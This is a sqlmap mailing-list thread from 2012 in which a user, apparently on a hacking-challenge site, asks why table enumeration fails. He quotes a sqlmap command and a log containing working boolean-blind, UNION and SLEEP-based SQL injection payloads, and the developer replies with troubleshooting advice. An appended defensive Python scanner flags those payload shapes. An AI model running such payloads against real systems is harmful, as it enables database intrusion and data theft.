Hi Firat.

First of all please always keep your sqlmap up to date. Current revision is
r5022 and you are running r4766.

Second, could you please explain how you got "OR '38'='38'" inside
those payloads? We already have mechanisms to prevent this kind of "user
behavior", but you've obviously circumvented that somehow (--prefix, or maybe
you've entered that one manually inside the form search prompts). The thing is
that OR A=A is never a smart thing to do inside a SQL injection tool. That's
simply because OR 1=1 always results in TRUE, potentially screwing the user
with false results.

Third, it would be great if you could send database names you've retrieved.
It's quite possible that there are some permission problems you are
experiencing around system "mysql" database. Also, you are maybe
experiencing permission problems when accessing "information_schema"
database for retrieving identifier names.

Kind regards,
Miroslav Stampar

2012/4/27 Fırat Celal Erdik <fc.er...@gmail.com>

> Hi,
> Is there anybody who can help me with a MySQL boolean-based SQL injection
> exploitation with sqlmap? I found database names with sqlmap but I didn't
> find any tables from any database. I don't want to find table names from
> a common table names file. So, how can I get the full table names
> with sqlmap or another tool? I tried Havij but I cannot find any table
> name with it. Is there any idea?
>
> I had this error on sqlmap:
>
> ./sqlmap.py -u http://level4.hack2net.com/projects.php --forms -D mysql --tables
>
>     sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
>     http://www.sqlmap.org
>
> [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 15:01:42
>
> [15:01:42] [INFO] testing connection to the target url
> [15:01:43] [INFO] searching for forms
> [15:01:43] [INFO] sqlmap got a total of 2 targets
> [#1] form:
> POST http://level4.hack2net.com:80/projects.php?form=ara
> POST data: kelime=&tur=1&aramayap=Ara
> do you want to test this form? [Y/n/q]
> > y
> Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank fields detected):
> do you want to fill blank fields with random values? [Y/n] y
> [15:01:50] [INFO] using '/pentest/database/sqlmap/output/level4.hack2net.com/session' as session file
> [15:01:50] [INFO] resuming injection data from session file
> [15:01:50] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
> [15:01:50] [INFO] using '/pentest/database/sqlmap/output/results-04272012_0301pm.csv' as results file
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Place: POST
> Parameter: kelime
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: kelime=38' OR '38'='38' AND 5116=5116 AND 'Hbnf'='Hbnf&tur=4&aramayap=Ara
>
>     Type: UNION query
>     Title: MySQL UNION query (NULL) - 5 columns
>     Payload: kelime=38' OR '38'='38' UNION ALL SELECT CONCAT(0x3a6e656f3a,0x65594a514b5846697976,0x3a776f673a), NULL, NULL, NULL, NULL# AND 'ecra'='ecra&tur=4&aramayap=Ara
>
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 AND time-based blind
>     Payload: kelime=38' OR '38'='38' AND SLEEP(5) AND 'mlpI'='mlpI&tur=4&aramayap=Ara
> ---
>
> do you want to exploit this SQL injection? [Y/n] y
> [15:01:56] [INFO] the back-end DBMS is MySQL
>
> web application technology: PHP 5.3.5
> back-end DBMS: MySQL 5.0.11
> [15:01:56] [INFO] fetching tables for database: mysql
> [15:01:56] [INFO] fetching number of tables for database 'mysql'
> [15:01:56] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
> [15:01:56] [INFO] retrieved:
> [15:01:58] [WARNING] unable to retrieve the number of tables for database 'mysql'
> [15:01:58] [ERROR] unable to retrieve the table names for any database
> do you want to use common table existence check? [Y/n/q]
>
> Thanks a lot..
>
> --
> Fırat Celal Erdik
> Security Specialist, Certified Ethical Hacker - C|EH
> http://www.networkpentest.net
>
>
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm
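
Added example, not part of the original thread and not sqlmap code: a defender-side check in Python that flags the payload shapes visible in the quoted log (self-comparing literals such as '38'='38', SLEEP() calls, UNION SELECT) in a form-encoded POST body. The function names and finding labels are assumptions; the sample bodies are copied from the sqlmap output quoted above.

```python
import re
from urllib.parse import parse_qsl

# A literal compared with itself: '38'='38', 5116=5116, or 'Hbnf'='Hbnf where
# the closing quote is left for the application's own query to supply.
STRING_TAUTOLOGY = re.compile(r"'([^']*)'\s*=\s*'\1(?:'|$)")
NUMBER_TAUTOLOGY = re.compile(r"\b(\d+)\s*=\s*\1\b")
TIME_DELAY = re.compile(r"\bSLEEP\s*\(", re.IGNORECASE)
UNION_SELECT = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.IGNORECASE)

# Request bodies taken from the sqlmap output quoted in this thread,
# plus the unmodified form submission as a benign control.
SAMPLES = {
    "benign": "kelime=&tur=1&aramayap=Ara",
    "boolean": "kelime=38' OR '38'='38' AND 5116=5116 AND "
               "'Hbnf'='Hbnf&tur=4&aramayap=Ara",
    "union": "kelime=38' OR '38'='38' UNION ALL SELECT "
             "CONCAT(0x3a6e656f3a,0x65594a514b5846697976,0x3a776f673a), "
             "NULL, NULL, NULL, NULL# AND 'ecra'='ecra&tur=4&aramayap=Ara",
    "time": "kelime=38' OR '38'='38' AND SLEEP(5) AND "
            "'mlpI'='mlpI&tur=4&aramayap=Ara",
}

def scan_value(value):
    """Return the sorted list of suspicious patterns found in one field value."""
    findings = set()
    if STRING_TAUTOLOGY.search(value) or NUMBER_TAUTOLOGY.search(value):
        findings.add("tautology")
    if TIME_DELAY.search(value):
        findings.add("time-delay")
    if UNION_SELECT.search(value):
        findings.add("union-select")
    return sorted(findings)

def scan_body(body):
    """Map each flagged parameter of a form-encoded body to its findings."""
    flagged = {}
    # parse_qsl splits each pair on the first '=' only, so '=' inside a
    # payload stays part of the value.
    for name, value in parse_qsl(body, keep_blank_values=True):
        hits = scan_value(value)
        if hits:
            flagged[name] = hits
    return flagged

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, scan_body(body))
```

Pattern matching of this kind is a triage aid for request logs; the fix for an injectable parameter is a parameterized query.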